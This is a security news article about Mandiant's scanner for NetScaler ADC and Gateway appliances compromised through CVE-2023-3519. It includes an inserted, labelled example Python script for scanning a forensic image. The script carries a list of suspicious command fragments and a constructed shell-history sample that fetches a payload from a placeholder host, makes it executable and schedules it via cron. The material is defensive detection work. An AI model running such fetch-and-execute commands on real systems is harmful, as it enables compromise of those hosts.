Mandiant Releases Scanner to Identify Compromised NetScaler ADC, Gateway
Mandiant's IoC Scanner will help enterprises collect indicators of compromise on affected Citrix NetScaler products.
With thousands of Citrix networking products vulnerable to a critical vulnerability still unpatched and exposed on the Internet, Mandiant has released a tool to help enterprise defenders identify those that have been compromised.
The IoC Scanner is designed to be used with Citrix ADC and Citrix Gateway versions 13.1, 13.0, 12.1, and 12.0.
Citrix issued a patch for the zero-day critical vulnerability (CVE-2023-3519) in its NetScaler application delivery controller and gateway products on July 18, along with a recommendation for organizations using the affected products to apply it immediately. The vuln could be exploited to allow unauthenticated remote code execution. Several threat groups are already actively exploiting the flaw by installing web shells inside of corporate networks and carrying out dozens of exploits.
Researchers say that nearly 7,000 instances remain exposed on the Web. Of those, around 460 have Web shells installed, likely due to compromise.
Mandiant's tool, available on GitHub, can identify the file system paths of known malware, post-exploitation activity in shell history, unexpected crontab entries and processes, and known malicious terms and unexpected modification of NetScaler directories. The standalone Bash script can be run directly on a Citrix ADC appliance to scan files, processes, and ports for known indicators. (The tool must be run as root in live mode on the appliance.) It can also inspect a mounted forensic image to use in an investigation, Mandiant said.
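To make the checks described above concrete, the following is an added example of how an investigator might run a small offline scan over a mounted forensic image: it flags crontab entries outside an expected allowlist, shell-history lines containing suspicious command fragments, and web-served files modified after a baseline timestamp. This is illustrative code written for this article, not Mandiant's scanner; the paths inside the image (`var/cron/tabs/root`, `root/.bash_history`, the `netscaler/www` web directory), the allowlist, and the suspicious-term list are all assumptions chosen for the demonstration, and the sample image it builds is constructed in a temporary directory.

```python
"""Minimal offline IoC scan over a mounted appliance image.

Added example, not Mandiant's IoC Scanner. Paths and indicator lists are
assumptions for the demo; a real scan would use the vendor's published IoCs.
"""
import os
import tempfile

# Assumed locations inside the mounted image, relative to its root.
CRONTAB_REL = "var/cron/tabs/root"      # assumed crontab path (FreeBSD-style layout)
HISTORY_REL = "root/.bash_history"      # assumed shell-history path
WEB_DIR_REL = "netscaler/www"           # placeholder for the web-served tree

# Constructed indicator lists for the demo (not real published IoCs).
EXPECTED_CRON = {"@daily /netscaler/nslog_rotate.sh"}
SUSPICIOUS_TERMS = ("curl http", "wget http", "chmod +x", "nohup", "base64 -d")
WEB_EXTS = (".php", ".html", ".js", ".sh")


def scan_crontab(path, expected):
    """Return crontab entries that are neither comments nor on the expected list."""
    if not os.path.exists(path):
        return []
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            entry = line.strip()
            if entry and not entry.startswith("#") and entry not in expected:
                findings.append(entry)
    return findings


def scan_shell_history(path, terms):
    """Return history lines that contain any of the suspicious terms."""
    if not os.path.exists(path):
        return []
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            entry = line.strip()
            if any(term in entry for term in terms):
                findings.append(entry)
    return findings


def scan_recent_web_files(web_dir, since_epoch, exts):
    """Return web-served files whose mtime is later than the baseline."""
    findings = []
    for dirpath, _dirs, files in os.walk(web_dir):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower().endswith(exts) and os.stat(full).st_mtime > since_epoch:
                findings.append(os.path.relpath(full, web_dir).replace(os.sep, "/"))
    return sorted(findings)


def scan_image(root, since_epoch):
    """Run every check against a mounted image rooted at `root`."""
    return {
        "crontab": scan_crontab(os.path.join(root, CRONTAB_REL), EXPECTED_CRON),
        "history": scan_shell_history(os.path.join(root, HISTORY_REL), SUSPICIOUS_TERMS),
        "web_files": scan_recent_web_files(os.path.join(root, WEB_DIR_REL), since_epoch, WEB_EXTS),
    }


def build_sample_image(base):
    """Create a constructed image tree with one planted finding per check."""
    def write(rel, text, mtime=None):
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(text)
        if mtime is not None:
            os.utime(full, (mtime, mtime))

    baseline = 1_000_000_000.0  # constructed "last known good" timestamp
    write(CRONTAB_REL, "# root crontab\n@daily /netscaler/nslog_rotate.sh\n* * * * * /tmp/.x/run.sh\n")
    write(HISTORY_REL, "ls -la /var/log\ncurl http://example.invalid/p -o /tmp/.x/run.sh\nchmod +x /tmp/.x/run.sh\n")
    write(os.path.join(WEB_DIR_REL, "index.html"), "<html></html>", mtime=baseline - 86400)
    write(os.path.join(WEB_DIR_REL, "vpn", "unexpected.php"), "<?php /* constructed */ ?>", mtime=baseline + 3600)
    return baseline


def demo():
    """Build the constructed image in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        since = build_sample_image(tmp)
        return scan_image(tmp, since)


if __name__ == "__main__":
    for check, hits in demo().items():
        print(f"{check}: {hits}")
```

The three checks mirror the categories the article lists (unexpected crontab entries, post-exploitation activity in shell history, unexpected modification of served directories). A real investigation would replace the constructed lists with the published indicators and treat a hit as a lead to examine, not as proof of compromise.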
The IoC Scanner will do a "best-effort job" at identifying compromised products, but it may not be able to find all compromised devices or to determine whether a device is vulnerable to exploitation, Mandiant said. "This tool is not guaranteed to find all evidence of compromise, or all evidence of compromise related to CVE 2023-3519," according to the company.